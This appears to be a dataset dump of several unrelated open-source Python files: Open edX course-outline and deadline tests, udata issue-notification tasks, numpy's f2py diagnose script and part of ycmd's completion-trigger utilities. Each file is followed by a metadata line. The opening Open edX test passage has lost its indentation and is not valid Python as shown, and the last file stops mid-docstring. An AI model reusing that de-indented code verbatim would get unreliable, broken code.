([CourseMode.AUDIT, CourseMode.VERIFIED], CourseMode.VERIFIED, False, True),
([CourseMode.MASTERS], CourseMode.MASTERS, False, True),
([CourseMode.PROFESSIONAL], CourseMode.PROFESSIONAL, True, True), # staff accounts should also see the banner
)
@ddt.unpack
def test_reset_course_deadlines_banner_shows_for_self_paced_course(
self,
course_modes,
enrollment_mode,
is_course_staff,
should_display
):
ContentTypeGatingConfig.objects.create(
enabled=True,
enabled_as_of=datetime.datetime(2017, 1, 1, tzinfo=UTC),
)
course = self.courses[0]
for mode in course_modes:
CourseModeFactory.create(course_id=course.id, mode_slug=mode)
enrollment = CourseEnrollment.objects.get(course_id=course.id, user=self.user)
enrollment.mode = enrollment_mode
enrollment.save()
enrollment.schedule.start_date = timezone.now() - datetime.timedelta(days=30)
enrollment.schedule.save()
self.user.is_staff = is_course_staff
self.user.save()
url = course_home_url(course)
response = self.client.get(url)
if should_display:
self.assertContains(response, '<div class="banner-cta-text"')
else:
self.assertNotContains(response, '<div class="banner-cta-text"')
@override_experiment_waffle_flag(RELATIVE_DATES_FLAG, active=True)
def test_reset_course_deadlines(self):
course = self.courses[0]
staff = StaffFactory(course_key=course.id)
CourseEnrollment.enroll(staff, course.id)
start_date = timezone.now() - datetime.timedelta(days=30)
Schedule.objects.update(start_date=start_date)
self.client.login(username=staff.username, password=TEST_PASSWORD)
self.update_masquerade(course=course, username=self.user.username)
post_dict = {'course_id': str(course.id)}
self.client.post(reverse(RESET_COURSE_DEADLINES_NAME), post_dict)
updated_schedule = Schedule.objects.get(enrollment__user=self.user, enrollment__course_id=course.id)
assert updated_schedule.start_date.date() == datetime.datetime.today().date()
updated_staff_schedule = Schedule.objects.get(enrollment__user=staff, enrollment__course_id=course.id)
assert updated_staff_schedule.start_date == start_date
@override_experiment_waffle_flag(RELATIVE_DATES_FLAG, active=True)
def test_reset_course_deadlines_masquerade_generic_student(self):
course = self.courses[0]
staff = StaffFactory(course_key=course.id)
CourseEnrollment.enroll(staff, course.id)
start_date = timezone.now() - datetime.timedelta(days=30)
Schedule.objects.update(start_date=start_date)
self.client.login(username=staff.username, password=TEST_PASSWORD)
self.update_masquerade(course=course)
post_dict = {'course_id': str(course.id)}
self.client.post(reverse(RESET_COURSE_DEADLINES_NAME), post_dict)
updated_student_schedule = Schedule.objects.get(enrollment__user=self.user, enrollment__course_id=course.id)
assert updated_student_schedule.start_date == start_date
updated_staff_schedule = Schedule.objects.get(enrollment__user=staff, enrollment__course_id=course.id)
assert updated_staff_schedule.start_date.date() == datetime.date.today()
class TestCourseOutlinePageWithPrerequisites(SharedModuleStoreTestCase, MilestonesTestCaseMixin):
"""
Test the course outline view with prerequisites.
"""
TRANSFORMER_CLASS_TO_TEST = MilestonesAndSpecialExamsTransformer
@classmethod
def setUpClass(cls):
"""
Creates a test course that can be used for non-destructive tests
"""
# pylint: disable=super-method-not-called
cls.PREREQ_REQUIRED = '(Prerequisite required)'
cls.UNLOCKED = 'Unlocked'
with super(TestCourseOutlinePageWithPrerequisites, cls).setUpClassAndTestData():
cls.course, cls.course_blocks = cls.create_test_course()
@classmethod
def setUpTestData(cls): # lint-amnesty, pylint: disable=super-method-not-called
"""Set up and enroll our fake user in the course."""
cls.user = UserFactory(password=TEST_PASSWORD)
CourseEnrollment.enroll(cls.user, cls.course.id)
@classmethod
def create_test_course(cls):
"""Creates a test course."""
course = CourseFactory.create()
course.enable_subsection_gating = True
course_blocks = {}
with cls.store.bulk_operations(course.id):
course_blocks['chapter'] = ItemFactory.create(
category='chapter',
parent_location=course.location
)
course_blocks['prerequisite'] = ItemFactory.create(
category='sequential',
parent_location=course_blocks['chapter'].location,
display_name='Prerequisite Exam'
)
course_blocks['gated_content'] = ItemFactory.create(
category='sequential',
parent_location=course_blocks['chapter'].location,
display_name='Gated Content'
)
course_blocks['prerequisite_vertical'] = ItemFactory.create(
category='vertical',
parent_location=course_blocks['prerequisite'].location
)
course_blocks['gated_content_vertical'] = ItemFactory.create(
category='vertical',
parent_location=course_blocks['gated_content'].location
)
course.children = [course_blocks['chapter']]
course_blocks['chapter'].children = [course_blocks['prerequisite'], course_blocks['gated_content']]
course_blocks['prerequisite'].children = [course_blocks['prerequisite_vertical']]
course_blocks['gated_content'].children = [course_blocks['gated_content_vertical']]
if hasattr(cls, 'user'):
CourseEnrollment.enroll(cls.user, course.id)
return course, course_blocks
def setUp(self):
"""
Set up for the tests.
"""
super(TestCourseOutlinePageWithPrerequisites, self).setUp() # lint-amnesty, pylint: disable=super-with-arguments
self.client.login(username=self.user.username, password=TEST_PASSWORD)
def setup_gated_section(self, gated_block, gating_block):
"""
Test helper to create a gating requirement
Args:
            gated_block: The block that the learner will not have access to until they complete the gating block
gating_block: (The prerequisite) The block that must be completed to get access to the gated block
"""
gating_api.add_prerequisite(self.course.id, six.text_type(gating_block.location))
gating_api.set_required_content(self.course.id, gated_block.location, gating_block.location, 100)
def test_content_locked(self):
"""
Test that a sequential/subsection with unmet prereqs correctly indicated that its content is locked
"""
course = self.course
self.setup_gated_section(self.course_blocks['gated_content'], self.course_blocks['prerequisite'])
response = self.client.get(course_home_url(course))
assert response.status_code == 200
response_content = pq(response.content)
# check lock icon is present
lock_icon = response_content('.fa-lock')
assert lock_icon, 'lock icon is not present, but should be'
subsection = lock_icon.parents('.subsection-text')
# check that subsection-title-name is the display name
gated_subsection_title = self.course_blocks['gated_content'].display_name
assert gated_subsection_title in subsection.children('.subsection-title').html()
# check that it says prerequisite required
assert 'Prerequisite:' in subsection.children('.details').html()
# check that there is not a screen reader message
assert not subsection.children('.sr')
def test_content_unlocked(self):
"""
Test that a sequential/subsection with met prereqs correctly indicated that its content is unlocked
"""
course = self.course
self.setup_gated_section(self.course_blocks['gated_content'], self.course_blocks['prerequisite'])
# complete the prerequisite to unlock the gated content
# this call triggers reevaluation of prerequisites fulfilled by the gating block.
with patch('openedx.core.lib.gating.api.get_subsection_completion_percentage', Mock(return_value=100)):
lms_gating_api.evaluate_prerequisite(
self.course,
Mock(location=self.course_blocks['prerequisite'].location, percent_graded=1.0),
self.user,
)
response = self.client.get(course_home_url(course))
assert response.status_code == 200
response_content = pq(response.content)
# check unlock icon is not present
unlock_icon = response_content('.fa-unlock')
assert not unlock_icon, "unlock icon is present, yet shouldn't be."
gated_subsection_title = self.course_blocks['gated_content'].display_name
every_subsection_on_outline = response_content('.subsection-title')
subsection_has_gated_text = False
says_prerequisite_required = False
for subsection_contents in every_subsection_on_outline.contents():
subsection_has_gated_text = gated_subsection_title in subsection_contents
says_prerequisite_required = "Prerequisite:" in subsection_contents
# check that subsection-title-name is the display name of gated content section
assert subsection_has_gated_text
assert not says_prerequisite_required
class TestCourseOutlineResumeCourse(SharedModuleStoreTestCase, CompletionWaffleTestMixin):
"""
Test start course and resume course for the course outline view.
Technically, this mixes course home and course outline tests, but checking
the counts of start/resume course should be done together to avoid false
positives.
"""
@classmethod
def setUpClass(cls):
"""
Creates a test course that can be used for non-destructive tests
"""
# setUpClassAndTestData() already calls setUpClass on SharedModuleStoreTestCase
# pylint: disable=super-method-not-called
with super(TestCourseOutlineResumeCourse, cls).setUpClassAndTestData():
cls.course = cls.create_test_course()
@classmethod
def setUpTestData(cls): # lint-amnesty, pylint: disable=super-method-not-called
"""Set up and enroll our fake user in the course."""
cls.user = UserFactory(password=TEST_PASSWORD)
CourseEnrollment.enroll(cls.user, cls.course.id)
cls.site = Site.objects.get_current()
@classmethod
def create_test_course(cls):
"""
Creates a test course.
"""
course = CourseFactory.create()
with cls.store.bulk_operations(course.id):
chapter = ItemFactory.create(category='chapter', parent_location=course.location)
chapter2 = ItemFactory.create(category='chapter', parent_location=course.location)
sequential = ItemFactory.create(category='sequential', parent_location=chapter.location)
sequential2 = ItemFactory.create(category='sequential', parent_location=chapter.location)
sequential3 = ItemFactory.create(category='sequential', parent_location=chapter2.location)
sequential4 = ItemFactory.create(category='sequential', parent_location=chapter2.location)
vertical = ItemFactory.create(category='vertical', parent_location=sequential.location)
vertical2 = ItemFactory.create(category='vertical', parent_location=sequential2.location)
vertical3 = ItemFactory.create(category='vertical', parent_location=sequential3.location)
vertical4 = ItemFactory.create(category='vertical', parent_location=sequential4.location)
course.children = [chapter, chapter2]
chapter.children = [sequential, sequential2]
chapter2.children = [sequential3, sequential4]
sequential.children = [vertical]
sequential2.children = [vertical2]
sequential3.children = [vertical3]
sequential4.children = [vertical4]
if hasattr(cls, 'user'):
CourseEnrollment.enroll(cls.user, course.id)
return course
def setUp(self):
"""
Set up for the tests.
"""
super(TestCourseOutlineResumeCourse, self).setUp() # lint-amnesty, pylint: disable=super-with-arguments
self.client.login(username=self.user.username, password=TEST_PASSWORD)
def visit_sequential(self, course, chapter, sequential):
"""
Navigates to the provided sequential.
"""
last_accessed_url = reverse(
'courseware_section',
kwargs={
'course_id': text_type(course.id),
'chapter': chapter.url_name,
'section': sequential.url_name,
}
)
assert 200 == self.client.get(last_accessed_url).status_code
@override_waffle_switch(ENABLE_COMPLETION_TRACKING_SWITCH, active=True)
def complete_sequential(self, course, sequential):
"""
Completes provided sequential.
"""
course_key = CourseKey.from_string(str(course.id))
# Fake a visit to sequence2/vertical2
block_key = UsageKey.from_string(six.text_type(sequential.location))
if block_key.course_key.run is None:
# Old mongo keys must be annotated with course run info before calling submit_completion:
block_key = block_key.replace(course_key=course_key)
completion = 1.0
BlockCompletion.objects.submit_completion(
user=self.user,
block_key=block_key,
completion=completion
)
def visit_course_home(self, course, start_count=0, resume_count=0):
"""
        Helper function to navigate to the course home page and test for resume buttons
:param course: course factory object
:param start_count: number of times 'Start Course' should appear
:param resume_count: number of times 'Resume Course' should appear
:return: response object
"""
response = self.client.get(course_home_url(course))
assert response.status_code == 200
self.assertContains(response, 'Start Course', count=start_count)
self.assertContains(response, 'Resume Course', count=resume_count)
return response
def test_course_home_completion(self):
"""
Test that completed blocks appear checked on course home page
"""
self.override_waffle_switch(True)
course = self.course
vertical = course.children[0].children[0].children[0]
response = self.client.get(course_home_url(course))
content = pq(response.content)
assert len(content('.fa-check')) == 0
self.complete_sequential(self.course, vertical)
response = self.client.get(course_home_url(course))
content = pq(response.content)
# Subsection should be checked
assert len(content('.fa-check')) == 1
def test_start_course(self):
"""
Tests that the start course button appears when the course has never been accessed.
Technically, this is a course home test, and not a course outline test, but checking the counts of
        start/resume course should be done together to avoid a false positive.
"""
course = self.course
response = self.visit_course_home(course, start_count=1, resume_count=0)
content = pq(response.content)
vertical = course.children[0].children[0].children[0]
assert content('.action-resume-course').attr('href').endswith(('/vertical/' + vertical.url_name))
@override_settings(LMS_BASE='test_url:9999')
def test_resume_course_with_completion_api(self):
"""
Tests completion API resume button functionality
"""
self.override_waffle_switch(True)
# Course tree
course = self.course
vertical1 = course.children[0].children[0].children[0]
vertical2 = course.children[0].children[1].children[0]
self.complete_sequential(self.course, vertical1)
# Test for 'resume' link
response = self.visit_course_home(course, resume_count=1)
# Test for 'resume' link URL - should be vertical 1
content = pq(response.content)
assert content('.action-resume-course').attr('href').endswith(('/vertical/' + vertical1.url_name))
self.complete_sequential(self.course, vertical2)
# Test for 'resume' link
response = self.visit_course_home(course, resume_count=1)
# Test for 'resume' link URL - should be vertical 2
content = pq(response.content)
assert content('.action-resume-course').attr('href').endswith(('/vertical/' + vertical2.url_name))
# visit sequential 1, make sure 'Resume Course' URL is robust against 'Last Visited'
# (even though I visited seq1/vert1, 'Resume Course' still points to seq2/vert2)
self.visit_sequential(course, course.children[0], course.children[0].children[0])
# Test for 'resume' link URL - should be vertical 2 (last completed block, NOT last visited)
response = self.visit_course_home(course, resume_count=1)
content = pq(response.content)
assert content('.action-resume-course').attr('href').endswith(('/vertical/' + vertical2.url_name))
def test_resume_course_deleted_sequential(self):
"""
Tests resume course when the last completed sequential is deleted and
there is another sequential in the vertical.
"""
course = self.create_test_course()
# first navigate to a sequential to make it the last accessed
chapter = course.children[0]
assert len(chapter.children) >= 2
sequential = chapter.children[0]
sequential2 = chapter.children[1]
self.complete_sequential(course, sequential)
self.complete_sequential(course, sequential2)
# remove one of the sequentials from the chapter
with self.store.branch_setting(ModuleStoreEnum.Branch.draft_preferred, course.id):
self.store.delete_item(sequential.location, self.user.id)
# check resume course buttons
response = self.visit_course_home(course, resume_count=1)
content = pq(response.content)
assert content('.action-resume-course').attr('href').endswith(('/sequential/' + sequential2.url_name))
def test_resume_course_deleted_sequentials(self):
"""
Tests resume course when the last completed sequential is deleted and
there are no sequentials left in the vertical.
"""
course = self.create_test_course()
# first navigate to a sequential to make it the last accessed
chapter = course.children[0]
assert len(chapter.children) == 2
sequential = chapter.children[0]
self.complete_sequential(course, sequential)
# remove all sequentials from chapter
with self.store.branch_setting(ModuleStoreEnum.Branch.draft_preferred, course.id):
for sequential in chapter.children:
self.store.delete_item(sequential.location, self.user.id)
# check resume course buttons
self.visit_course_home(course, start_count=1, resume_count=0)
def test_course_home_for_global_staff(self):
"""
Tests that staff user can access the course home without being enrolled
in the course.
"""
course = self.course
self.user.is_staff = True
self.user.save()
self.override_waffle_switch(True)
CourseEnrollment.get_enrollment(self.user, course.id).delete()
response = self.visit_course_home(course, start_count=1, resume_count=0)
content = pq(response.content)
vertical = course.children[0].children[0].children[0]
assert content('.action-resume-course').attr('href').endswith(('/vertical/' + vertical.url_name))
@override_waffle_switch(ENABLE_COMPLETION_TRACKING_SWITCH, active=True)
def test_course_outline_auto_open(self):
"""
Tests that the course outline auto-opens to the first subsection
in a course if a user has no completion data, and to the
last-accessed subsection if a user does have completion data.
"""
def get_sequential_button(url, is_hidden):
is_hidden_string = "is-hidden" if is_hidden else ""
return "<olclass=\"outline-itemaccordion-panel" + is_hidden_string + "\"" \
"id=\"" + url + "_contents\"" \
"aria-labelledby=\"" + url + "\"" \
">"
# Course tree
course = self.course
chapter1 = course.children[0]
chapter2 = course.children[1]
response_content = self.client.get(course_home_url(course)).content
stripped_response = text_type(re.sub(b"\\s+", b"", response_content), "utf-8")
assert get_sequential_button(text_type(chapter1.location), False) in stripped_response
assert get_sequential_button(text_type(chapter2.location), True) in stripped_response
content = pq(response_content)
button = content('#expand-collapse-outline-all-button')
assert 'Expand All' == button.children()[0].text
def test_user_enrolled_after_completion_collection(self):
"""
Tests that the _completion_data_collection_start() method returns the created
time of the waffle switch that enables completion data tracking.
"""
view = CourseOutlineFragmentView()
switch_name = ENABLE_COMPLETION_TRACKING_SWITCH.name
switch, _ = Switch.objects.get_or_create(name=switch_name)
# pylint: disable=protected-access
assert switch.created == view._completion_data_collection_start()
switch.delete()
def test_user_enrolled_after_completion_collection_default(self):
"""
Tests that the _completion_data_collection_start() method returns a default constant
when no Switch object exists for completion data tracking.
"""
view = CourseOutlineFragmentView()
# pylint: disable=protected-access
assert DEFAULT_COMPLETION_TRACKING_START == view._completion_data_collection_start()
class TestCourseOutlinePreview(SharedModuleStoreTestCase, MasqueradeMixin):
"""
Unit tests for staff preview of the course outline.
"""
def test_preview(self):
"""
Verify the behavior of preview for the course outline.
"""
course = CourseFactory.create(
start=datetime.datetime.now() - datetime.timedelta(days=30)
)
staff_user = StaffFactory(course_key=course.id, password=TEST_PASSWORD)
CourseEnrollment.enroll(staff_user, course.id)
future_date = datetime.datetime.now() + datetime.timedelta(days=30)
with self.store.bulk_operations(course.id):
chapter = ItemFactory.create(
category='chapter',
parent_location=course.location,
display_name='First Chapter',
)
sequential = ItemFactory.create(category='sequential', parent_location=chapter.location)
ItemFactory.create(category='vertical', parent_location=sequential.location)
chapter = ItemFactory.create(
category='chapter',
parent_location=course.location,
display_name='Future Chapter',
start=future_date,
)
sequential = ItemFactory.create(category='sequential', parent_location=chapter.location)
ItemFactory.create(category='vertical', parent_location=sequential.location)
# Verify that a staff user sees a chapter with a start date in the future
self.client.login(username=staff_user.username, password=TEST_PASSWORD)
url = course_home_url(course)
response = self.client.get(url)
assert response.status_code == 200
self.assertContains(response, 'Future Chapter')
# Verify that staff masquerading as a learner see the future chapter.
self.update_masquerade(course=course, role='student')
response = self.client.get(url)
assert response.status_code == 200
self.assertContains(response, 'Future Chapter')
| agpl-3.0 | -494,362,490,768,276,200 | 43.699219 | 183 | 0.659879 | false |
opendatateam/udata | udata/core/issues/tasks.py | 2 | 2336 | from udata import mail
from udata.i18n import lazy_gettext as _
from udata.models import Dataset, Reuse
from udata.tasks import connect, get_logger
from .models import Issue, Message
from .signals import on_new_issue, on_new_issue_comment, on_issue_closed
log = get_logger(__name__)
def owner_recipients(issue):
if issue.subject.organization:
return [m.user for m in issue.subject.organization.members]
else:
return [issue.subject.owner]
@connect(on_new_issue, by_id=True)
def notify_new_issue(issue_id):
issue = Issue.objects.get(pk=issue_id)
if isinstance(issue.subject, (Dataset, Reuse)):
recipients = owner_recipients(issue)
subject = _('Your %(type)s has a new issue',
type=issue.subject.verbose_name)
mail.send(subject, recipients, 'new_issue', issue=issue,
message=issue.discussion[0])
else:
log.warning('Unrecognized issue subject type %s', type(issue.subject))
@connect(on_new_issue_comment, by_id=True)
def notify_new_issue_comment(issue_id, message=None):
issue = Issue.objects.get(pk=issue_id)
message = issue.discussion[message]
if isinstance(issue.subject, (Dataset, Reuse)):
recipients = owner_recipients(issue) + [
m.posted_by for m in issue.discussion]
recipients = [u for u in set(recipients) if u != message.posted_by]
subject = _('%(user)s commented on your issue',
user=message.posted_by.fullname)
mail.send(subject, recipients, 'new_issue_comment',
issue=issue, message=message)
else:
log.warning('Unrecognized issue subject type %s', type(issue.subject))
@connect(on_issue_closed, by_id=True)
def notify_issue_closed(issue_id, message=None):
issue = Issue.objects.get(pk=issue_id)
message = issue.discussion[message]
if isinstance(issue.subject, (Dataset, Reuse)):
recipients = owner_recipients(issue) + [
m.posted_by for m in issue.discussion]
recipients = [u for u in set(recipients) if u != message.posted_by]
subject = _('An issue has been closed')
mail.send(subject, recipients, 'issue_closed',
issue=issue, message=message)
else:
log.warning('Unrecognized issue subject type %s', type(issue.subject))
| agpl-3.0 | 2,922,285,658,324,438,500 | 37.933333 | 78 | 0.659247 | false |
houseind/robothon | GlyphProofer/dist/GlyphProofer.app/Contents/Resources/lib/python2.6/numpy/f2py/diagnose.py | 7 | 5683 | #!/usr/bin/env python
import os,sys,tempfile
def run_command(cmd):
print 'Running %r:' % (cmd)
s = os.system(cmd)
print '------'
def run():
_path = os.getcwd()
os.chdir(tempfile.gettempdir())
print '------'
print 'os.name=%r' % (os.name)
print '------'
print 'sys.platform=%r' % (sys.platform)
print '------'
print 'sys.version:'
print sys.version
print '------'
print 'sys.prefix:'
print sys.prefix
print '------'
print 'sys.path=%r' % (':'.join(sys.path))
print '------'
try:
import Numeric
has_Numeric = 1
except ImportError:
print 'Failed to import Numeric:',sys.exc_value
has_Numeric = 0
try:
import numarray
has_numarray = 1
except ImportError:
print 'Failed to import numarray:',sys.exc_value
has_numarray = 0
try:
import numpy
has_newnumpy = 1
except ImportError:
print 'Failed to import new numpy:', sys.exc_value
has_newnumpy = 0
try:
import f2py2e
has_f2py2e = 1
except ImportError:
print 'Failed to import f2py2e:',sys.exc_value
has_f2py2e = 0
try:
import numpy.distutils
has_numpy_distutils = 2
except ImportError:
try:
import numpy_distutils
has_numpy_distutils = 1
except ImportError:
print 'Failed to import numpy_distutils:',sys.exc_value
has_numpy_distutils = 0
if has_Numeric:
try:
print 'Found Numeric version %r in %s' % \
(Numeric.__version__,Numeric.__file__)
except Exception,msg:
print 'error:',msg
print '------'
if has_numarray:
try:
print 'Found numarray version %r in %s' % \
(numarray.__version__,numarray.__file__)
except Exception,msg:
print 'error:',msg
print '------'
if has_newnumpy:
try:
print 'Found new numpy version %r in %s' % \
(numpy.__version__, numpy.__file__)
except Exception,msg:
print 'error:', msg
print '------'
if has_f2py2e:
try:
print 'Found f2py2e version %r in %s' % \
(f2py2e.__version__.version,f2py2e.__file__)
except Exception,msg:
print 'error:',msg
print '------'
if has_numpy_distutils:
try:
if has_numpy_distutils==2:
print 'Found numpy.distutils version %r in %r' % (\
numpy.distutils.__version__,
numpy.distutils.__file__)
else:
print 'Found numpy_distutils version %r in %r' % (\
numpy_distutils.numpy_distutils_version.numpy_distutils_version,
numpy_distutils.__file__)
print '------'
except Exception,msg:
print 'error:',msg
print '------'
try:
if has_numpy_distutils==1:
print 'Importing numpy_distutils.command.build_flib ...',
import numpy_distutils.command.build_flib as build_flib
print 'ok'
print '------'
try:
print 'Checking availability of supported Fortran compilers:'
for compiler_class in build_flib.all_compilers:
compiler_class(verbose=1).is_available()
print '------'
except Exception,msg:
print 'error:',msg
print '------'
except Exception,msg:
print 'error:',msg,'(ignore it, build_flib is obsolete for numpy.distutils 0.2.2 and up)'
print '------'
try:
if has_numpy_distutils==2:
print 'Importing numpy.distutils.fcompiler ...',
import numpy.distutils.fcompiler as fcompiler
else:
print 'Importing numpy_distutils.fcompiler ...',
import numpy_distutils.fcompiler as fcompiler
print 'ok'
print '------'
try:
print 'Checking availability of supported Fortran compilers:'
fcompiler.show_fcompilers()
print '------'
except Exception,msg:
print 'error:',msg
print '------'
except Exception,msg:
print 'error:',msg
print '------'
try:
if has_numpy_distutils==2:
print 'Importing numpy.distutils.cpuinfo ...',
from numpy.distutils.cpuinfo import cpuinfo
print 'ok'
print '------'
else:
try:
print 'Importing numpy_distutils.command.cpuinfo ...',
from numpy_distutils.command.cpuinfo import cpuinfo
print 'ok'
print '------'
except Exception,msg:
print 'error:',msg,'(ignore it)'
print 'Importing numpy_distutils.cpuinfo ...',
from numpy_distutils.cpuinfo import cpuinfo
print 'ok'
print '------'
cpu = cpuinfo()
print 'CPU information:',
for name in dir(cpuinfo):
if name[0]=='_' and name[1]!='_' and getattr(cpu,name[1:])():
print name[1:],
print '------'
except Exception,msg:
print 'error:',msg
print '------'
os.chdir(_path)
if __name__ == "__main__":
run()
| mit | 1,156,515,901,983,183,600 | 33.23494 | 101 | 0.48302 | false |
oblitum/ycmd | ycmd/completers/completer_utils.py | 1 | 9555 | # Copyright (C) 2013 Google Inc.
#
# This file is part of ycmd.
#
# ycmd is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ycmd is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ycmd. If not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
# Not installing aliases from python-future; it's unreliable and slow.
from builtins import * # noqa
# Must not import ycm_core here! Vim imports completer, which imports this file.
# We don't want ycm_core inside Vim.
import os
import re
from collections import defaultdict
from future.utils import iteritems
from ycmd.utils import ToCppStringCompatible, ToUnicode, ReadFile
class PreparedTriggers( object ):
def __init__( self, user_trigger_map = None, filetype_set = None ):
user_prepared_triggers = ( _FiletypeTriggerDictFromSpec(
dict( user_trigger_map ) ) if user_trigger_map else
defaultdict( set ) )
final_triggers = _FiletypeDictUnion( PREPARED_DEFAULT_FILETYPE_TRIGGERS,
user_prepared_triggers )
if filetype_set:
final_triggers = dict( ( k, v ) for k, v in iteritems( final_triggers )
if k in filetype_set )
self._filetype_to_prepared_triggers = final_triggers
def MatchingTriggerForFiletype( self,
current_line,
start_codepoint,
column_codepoint,
filetype ):
try:
triggers = self._filetype_to_prepared_triggers[ filetype ]
except KeyError:
return None
return _MatchingSemanticTrigger( current_line,
start_codepoint,
column_codepoint,
triggers )
def MatchesForFiletype( self,
current_line,
start_codepoint,
column_codepoint,
filetype ):
return self.MatchingTriggerForFiletype( current_line,
start_codepoint,
column_codepoint,
filetype ) is not None
def _FiletypeTriggerDictFromSpec( trigger_dict_spec ):
triggers_for_filetype = defaultdict( set )
for key, triggers in iteritems( trigger_dict_spec ):
filetypes = key.split( ',' )
for filetype in filetypes:
regexes = [ _PrepareTrigger( x ) for x in triggers ]
triggers_for_filetype[ filetype ].update( regexes )
return triggers_for_filetype
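# Illustrative example (added for clarity; not part of the original ycmd
# source). Given a user-style spec with comma-separated filetype keys,
# _FiletypeTriggerDictFromSpec splits the keys and compiles every trigger:
#
# spec = { 'c,cpp': [ '->', 're!\w+\.' ] }
# prepared = _FiletypeTriggerDictFromSpec( spec )
# # prepared[ 'c' ] and prepared[ 'cpp' ] each hold two compiled regexes:
# # one literal ( '->' ) and one raw regex ( '\w+\.' ).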
def _FiletypeDictUnion( dict_one, dict_two ):
"""Returns a new filetype dict that's a union of the provided two dicts.
Dict params are supposed to be type defaultdict(set)."""
def UpdateDict( first, second ):
for key, value in iteritems( second ):
first[ key ].update( value )
final_dict = defaultdict( set )
UpdateDict( final_dict, dict_one )
UpdateDict( final_dict, dict_two )
return final_dict
# start_codepoint and column_codepoint are codepoint offsets in the unicode
# string line_value.
def _RegexTriggerMatches( trigger,
line_value,
start_codepoint,
column_codepoint ):
for match in trigger.finditer( line_value ):
# By definition of 'start_codepoint', we know that the character just before
# 'start_codepoint' is not an identifier character but all characters
# between 'start_codepoint' and 'column_codepoint' are. This means that if
# our trigger ends with an identifier character, its tail must match between
# 'start_codepoint' and 'column_codepoint', 'start_codepoint' excluded. But
# if it doesn't, its tail must match exactly at 'start_codepoint'. Both
# cases are mutually exclusive hence the following condition.
if start_codepoint <= match.end() and match.end() <= column_codepoint:
return True
return False
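# Worked example of the condition above (added for illustration; the values
# are hypothetical). For line_value = 'foo.ba' with the caret after 'ba':
# column_codepoint = 6, start_codepoint = 4 (the identifier 'ba' begins right
# after the dot), and a '.' trigger matches with match.end() == 4, so
# 4 <= 4 <= 6 holds and the trigger fires.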
# start_codepoint and column_codepoint are 0-based and are codepoint offsets
# into the unicode string line_value.
def _MatchingSemanticTrigger( line_value, start_codepoint, column_codepoint,
trigger_list ):
if start_codepoint < 0 or column_codepoint < 0:
return None
line_length = len( line_value )
if not line_length or start_codepoint > line_length:
return None
# Ignore characters after user's caret column
line_value = line_value[ : column_codepoint ]
for trigger in trigger_list:
if _RegexTriggerMatches( trigger,
line_value,
start_codepoint,
column_codepoint ):
return trigger
return None
def _MatchesSemanticTrigger( line_value, start_codepoint, column_codepoint,
trigger_list ):
return _MatchingSemanticTrigger( line_value,
start_codepoint,
column_codepoint,
trigger_list ) is not None
def _PrepareTrigger( trigger ):
trigger = ToUnicode( trigger )
if trigger.startswith( TRIGGER_REGEX_PREFIX ):
return re.compile( trigger[ len( TRIGGER_REGEX_PREFIX ) : ], re.UNICODE )
return re.compile( re.escape( trigger ), re.UNICODE )
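# Example behaviour (added; not in the original module): triggers prefixed
# with 're!' are compiled as-is, everything else is escaped and matched
# literally.
#
# _PrepareTrigger( '.' ).pattern # '\\.' (literal dot)
# _PrepareTrigger( 're!\w+\.' ).pattern # '\w+\.' (used as a raw regex)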
def _PathToCompletersFolder():
dir_of_current_script = os.path.dirname( os.path.abspath( __file__ ) )
return os.path.join( dir_of_current_script )
def PathToFiletypeCompleterPluginLoader( filetype ):
return os.path.join( _PathToCompletersFolder(), filetype, 'hook.py' )
def FiletypeCompleterExistsForFiletype( filetype ):
return os.path.exists( PathToFiletypeCompleterPluginLoader( filetype ) )
def FilterAndSortCandidatesWrap( candidates, sort_property, query ):
from ycm_core import FilterAndSortCandidates
# The c++ interface we use only understands the (*native*) 'str' type (i.e.
# not the 'str' type from python-future. If we pass it a 'unicode' or
# 'bytes' instance then various things blow up, such as converting to
# std::string. Therefore all strings passed into the c++ API must pass through
# ToCppStringCompatible (or more strictly all strings which the C++ code
# needs to use and convert. In this case, just the insertion text property)
# For efficiency, the conversion of the insertion text property is done in the
# C++ layer.
return FilterAndSortCandidates( candidates,
ToCppStringCompatible( sort_property ),
ToCppStringCompatible( query ) )
TRIGGER_REGEX_PREFIX = 're!'
DEFAULT_FILETYPE_TRIGGERS = {
'c' : [ '->', '.', '(', ',' ],
'objc' : [
'->',
'.',
r're!\[[_a-zA-Z]+\w*\s', # bracketed calls
r're!^\s*[^\W\d]\w*\s', # bracketless calls
r're!\[.*\]\s', # method composition
],
'ocaml' : [ '.', '#' ],
'cpp,objcpp' : [ '->', '.', '::', '(', ',' ],
'perl' : [ '->' ],
'php' : [ '->', '::' ],
'cs,java,javascript,typescript,d,python,perl6,scala,vb,elixir,go,groovy' : [
'.'
],
'ruby,rust' : [ '.', '::' ],
'lua' : [ '.', ':' ],
'erlang' : [ ':' ],
'swift' : ['.', '(', ',', ':'],
}
PREPARED_DEFAULT_FILETYPE_TRIGGERS = _FiletypeTriggerDictFromSpec(
DEFAULT_FILETYPE_TRIGGERS )
INCLUDE_REGEX = re.compile( r'\s*#\s*(?:include|import)\s*("|<)' )
def AtIncludeStatementStart( line ):
match = INCLUDE_REGEX.match( line )
if not match:
return False
# Check if the whole string matches the regex
return match.end() == len( line )
def GetIncludeStatementValue( line, check_closing = True ):
"""Returns include statement value and boolean indicating whether
include statement is quoted.
If check_closing is True the string is scanned for statement closing
character (" or >) and substring between opening and closing characters is
returned. The whole string after opening character is returned otherwise"""
match = INCLUDE_REGEX.match( line )
include_value = None
quoted_include = False
if match:
quoted_include = ( match.group( 1 ) == '"' )
if not check_closing:
include_value = line[ match.end(): ]
else:
close_char = '"' if quoted_include else '>'
close_char_pos = line.find( close_char, match.end() )
if close_char_pos != -1:
include_value = line[ match.end() : close_char_pos ]
return include_value, quoted_include
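# Usage sketch (added for illustration only):
#
# GetIncludeStatementValue( '#include "foo.h"' ) # -> ( 'foo.h', True )
# GetIncludeStatementValue( '#include <vector>' ) # -> ( 'vector', False )
# GetIncludeStatementValue( '#include <vec', check_closing = False )
# # -> ( 'vec', False )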
def GetFileContents( request_data, filename ):
"""Returns the contents of the absolute path |filename| as a unicode
string. If the file contents exist in |request_data| (i.e. it is open and
